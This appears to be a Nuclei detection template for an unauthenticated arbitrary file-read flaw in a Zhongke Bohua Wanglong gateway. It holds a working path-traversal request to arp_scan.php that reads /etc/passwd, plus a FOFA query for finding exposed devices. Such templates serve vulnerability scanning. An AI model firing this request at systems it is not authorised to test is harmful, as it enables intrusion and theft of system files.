http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - sshd:x
            - /sbin/nologin
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /firewall/arp_scan.php?ifname=/../../../../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
id: bohuawanglong-arp_scan_php-File-reading
info:
    author: Superhero
    description: |-
        fofa: title="博华网龙"
        中科博华网龙网关 arp_scan.php 任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 中科博华网龙网关 arp_scan.php 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/nLP5coU3ljQRXMoUKfvykQ
    severity: high
    tags:
        - File reading
        - Firewall
        - SSH
